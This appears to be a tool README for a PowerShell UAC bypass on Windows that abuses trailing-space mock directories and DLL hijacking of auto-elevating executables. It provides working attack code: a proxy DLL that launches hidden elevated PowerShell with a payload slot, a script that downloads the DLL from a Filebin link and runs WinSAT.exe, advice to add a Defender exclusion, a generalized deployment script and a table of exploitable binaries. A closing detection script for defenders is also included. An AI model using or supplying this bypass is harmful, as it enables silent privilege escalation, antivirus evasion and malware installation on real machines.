A UAC bypass written in powershell

Overview

Powershell UAC bypass

Originally discovered by Daniel Gebert


Table of Contents
  1. Deployment
  2. Explanations
  3. Auto-elevate applications

Deployment

First, edit the script so that it downloads your malicious DLL from Filebin (or any other host you control).
To create that DLL easily, take this template and replace its dllmain.c with the code below.

dllmain.c

// Proxy DLL built from the template: prxdll.h, prx_attach and prx_detach come
// from that template and take care of forwarding the real DLL's exports.
#include "pch.h"
#include "prxdll.h"
#include <windows.h>

BOOL APIENTRY DllMain(
	const HINSTANCE instance,
	const DWORD reason,
	const PVOID reserved)
{
	switch (reason) {
	case DLL_PROCESS_ATTACH:
		// We are loaded inside the auto-elevated host, so the powershell.exe spawned
		// here inherits its elevated token. Replace YOURPOWERSHELLCOMMANDHERE with
		// the payload; the second argument (1) is SW_SHOWNORMAL, but the window is
		// hidden by -windowstyle hidden anyway.
		WinExec("powershell -NoProfile -ExecutionPolicy bypass -windowstyle hidden -Command \"Start-Process -verb runas powershell\" \"'-NoProfile -windowstyle hidden -ExecutionPolicy bypass -Command YOURPOWERSHELLCOMMANDHERE\" '\"", 1);
		DisableThreadLibraryCalls(instance);
		return prx_attach(instance);   // template's proxy initialisation
	case DLL_PROCESS_DETACH:
		prx_detach(reserved);
		break;
	}
	return TRUE;
}

This runs your PowerShell code as administrator.
Next we need an auto-elevating application to host the DLL. I prefer WinSAT.exe because it shows no GUI when run. The table under Auto-elevate applications lists other candidates.

Now edit the PowerShell script:

# Create the mock directory; the \\?\ prefix keeps the trailing space in "Windows "
New-Item '\\?\C:\Windows \System32' -ItemType Directory
Set-Location -Path '\\?\C:\Windows \System32'
# Copy the auto-elevating executable next to where the DLL will land
copy C:\Windows\System32\WinSAT.exe "C:\windows \System32\winSAT.exe"
# Fetch the proxy DLL (replace the URI with your own link)
Invoke-WebRequest -Uri 'https://filebin.net/bajzrgruy6h83o4n/version.dll' -OutFile 'version.dll'
# Run the copy: it auto-elevates and loads version.dll from its own folder
Start-Process -Filepath 'C:\windows \System32\winSAT.exe'
Start-Sleep -s 1
# Remove the mock tree
Remove-Item '\\?\C:\Windows \' -Force -Recurse

First modification:
Build your DLL with Visual Studio and upload it to Filebin. My DLL adds a Windows Defender exclusion so that the TEMP directory is not scanned.
Replace the Invoke-WebRequest URI with your link, and replace the copy argument with the path of the auto-elevating executable you chose.
Final step: join the lines with semicolons and wrap the result in a batch script:

powershell.exe -windowstyle hidden -NoProfile -ExecutionPolicy bypass -Command "Yourcodehere"

And boom! Run that command and your payload executes as administrator without a UAC prompt.

Remember: you can drive this from almost any high-level language, because all you need is the ability to run a system command.
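The deployment above as one script, added here as an example (my own code, not the PoC's): it takes the proxy DLL from a local path instead of Filebin, works for any executable/DLL pair from the Auto-elevate applications table rather than only WinSAT.exe/version.dll, and mirrors sub folders under the mock root so the target is found at the same relative path as the original (sysprep.exe lives below System32). The parameter names, the `\\?\` prefix on the copies and the two-second wait are my assumptions.

```powershell
# Added example, not the original PoC script. Run from a normal (non-elevated)
# PowerShell as a user who is in the Administrators group.
param(
    [Parameter(Mandatory)][string]$DllPath,   # your built proxy DLL (local path)
    [string]$Target  = 'WinSAT.exe',          # any executable from the table
    [string]$DllName = 'version.dll',         # the DLL that executable loads
    [int]$WaitSeconds = 2                     # assumed: time for the payload to fire
)

$realRoot = 'C:\Windows'
$mockRoot = 'C:\Windows '                     # trailing space: the mock directory

# Locate the target under System32 (sysprep.exe sits one level deeper, so
# recurse one level) and mirror its relative path under the mock root.
$src = Get-ChildItem -Path "$realRoot\System32" -Filter $Target -File -Recurse -Depth 1 -ErrorAction SilentlyContinue |
       Select-Object -First 1
if (-not $src) { throw "$Target not found under $realRoot\System32" }
$mockDir = $mockRoot + $src.DirectoryName.Substring($realRoot.Length)   # e.g. 'C:\Windows \System32'

# \\?\ switches off Win32 path normalisation, which would otherwise drop the
# trailing space and aim every write at the real System32 (access denied).
$lit = '\\?\' + $mockDir
New-Item -Path $lit -ItemType Directory -Force | Out-Null
Copy-Item -LiteralPath $src.FullName -Destination "$lit\$($src.Name)"
Copy-Item -LiteralPath $DllPath     -Destination "$lit\$DllName"

try {
    # The auto-elevate check sees the normalised path (the real System32) and
    # elevates; the copy that actually runs loads $DllName from its own folder.
    Start-Process -FilePath "$mockDir\$($src.Name)"
    Start-Sleep -Seconds $WaitSeconds
}
finally {
    # Remove the whole mock tree even if the launch failed.
    Remove-Item -LiteralPath ('\\?\' + $mockRoot + '\') -Recurse -Force -ErrorAction SilentlyContinue
}
```

The host process runs elevated, so this medium-integrity script cannot stop it afterwards. For sysprep.exe, which the table warns will really run if left alive, put the kill into the elevated payload itself (for example `Stop-Process -Name sysprep -Force` in front of YOURPOWERSHELLCOMMANDHERE in the DLL).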



Explanations

What Is UAC

Microsoft introduced UAC (User Account Control) with Windows Vista and Windows Server 2008.
In short, UAC aims to improve the security of Windows by running programs with standard user privileges until an administrator authorises an increase, or elevation, of privileges. (Wikipedia)


DLL Hijacking

DLL hijacking means a program loads and executes a malicious DLL because it sits in a location the loader searches before the legitimate copy, such as the same folder as the executable or as a data file the program opens. (Wikipedia)


Mock directories

Here's a description I stole from Daniel's blog:

Mock directories are folders with a trailing space. For example

C:\Windows \System32

See the space " " between "Windows" and "\System32".

Auto-elevate applications

Executable                      DLL          Comment
ComputerDefaults.exe            profapi.dll  Can also bypass UAC using other methods.
EASPolicyManagerBrokerHost.exe  profapi.dll
fodhelper.exe                   profapi.dll  Opens Settings; can also bypass UAC using other methods.
FXSUNATD.exe                    version.dll
msconfig.exe                    version.dll  Can also bypass UAC using other methods.
OptionalFeatures.exe            profapi.dll  Opens Windows Optional Features.
sdclt.exe                       profapi.dll  Can also bypass UAC using other methods; opens Windows Backup.
ServerManager.exe               profapi.dll  Not present by default.
systemreset.exe                 version.dll
sysprep.exe                     version.dll  Creates a sub folder. The sysprep process has to be killed directly after the UAC bypass, otherwise sysprep is executed!
SystemSettingsAdminFlows.exe    version.dll
WinSAT.exe                      version.dll
WSReset.exe                     profapi.dll  Opens the Windows Store.
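As an added check (my own code, not the PoC's or Daniel's), the following PowerShell hunts a host for what the Mock directories section and the table above describe: directories whose name ends in a space, and inside them any executable from the table sitting next to the DLL it loads. The pair list is copied from the table; `$Root`, `$Depth`, the function names and the signature check are my own choices.

```powershell
# Added example: hunt for mock directories and planted executable/DLL pairs.
# Run in any PowerShell session; reading the mock tree needs no elevation.

# Executable -> DLL it loads from its own folder, copied from the table above.
# Hashtable keys are case-insensitive, so 'winSAT.exe' still matches.
$AutoElevatePairs = @{
    'ComputerDefaults.exe'           = 'profapi.dll'
    'EASPolicyManagerBrokerHost.exe' = 'profapi.dll'
    'fodhelper.exe'                  = 'profapi.dll'
    'FXSUNATD.exe'                   = 'version.dll'
    'msconfig.exe'                   = 'version.dll'
    'OptionalFeatures.exe'           = 'profapi.dll'
    'sdclt.exe'                      = 'profapi.dll'
    'ServerManager.exe'              = 'profapi.dll'
    'systemreset.exe'                = 'version.dll'
    'sysprep.exe'                    = 'version.dll'
    'SystemSettingsAdminFlows.exe'   = 'version.dll'
    'WinSAT.exe'                     = 'version.dll'
    'WSReset.exe'                    = 'profapi.dll'
}

function Find-MockDirectory {
    param([string]$Root = 'C:\', [int]$Depth = 1)
    # Explorer and cmd refuse to create a name ending in a space, so every hit
    # deserves a look. .Name comes straight from the directory listing, so the
    # trailing space is still there even though most tools hide it.
    Get-ChildItem -LiteralPath $Root -Directory -Recurse -Depth $Depth -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Name.EndsWith(' ') }
}

function Test-MockDirectory {
    param([Parameter(Mandatory)][System.IO.DirectoryInfo]$Directory)
    # The \\?\ prefix switches off path normalisation, which would otherwise
    # turn 'C:\Windows \System32' back into the real System32 (the same
    # normalisation that fools the auto-elevate check).
    $literal = '\\?\' + $Directory.FullName.TrimEnd('\')
    $files = @(Get-ChildItem -LiteralPath $literal -File -Recurse -Force -ErrorAction SilentlyContinue)
    foreach ($exe in $files | Where-Object { $AutoElevatePairs.ContainsKey($_.Name) }) {
        $dllName = $AutoElevatePairs[$exe.Name]
        $dll = $files |
            Where-Object { $_.DirectoryName -eq $exe.DirectoryName -and $_.Name -eq $dllName } |
            Select-Object -First 1
        $signature = $null
        if ($dll) {
            # The real version.dll/profapi.dll are Microsoft-signed; a proxy DLL normally is not.
            $signature = (Get-AuthenticodeSignature -LiteralPath $dll.FullName -ErrorAction SilentlyContinue).Status
        }
        [pscustomobject]@{
            MockDirectory = $Directory.FullName
            Executable    = $exe.FullName
            ExpectedDll   = $dllName
            DllPlanted    = [bool]$dll
            DllSignature  = $signature
        }
    }
}

# Usage: every mock directory on C:, then the planted pairs inside each one.
$mocks = @(Find-MockDirectory -Root 'C:\' -Depth 1)
$mocks | Select-Object FullName
$mocks | ForEach-Object { Test-MockDirectory -Directory $_ }
```

A single auto-elevating executable copied into a trailing-space directory is already enough to act on; DllPlanted and an unsigned or NotSigned DllSignature just confirm that the hijack was staged. For continuous coverage, alert on directory creation events whose name ends in a space rather than sweeping the disk.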

Owner
Matt
Message me on Discord, loser: MattOverride#6768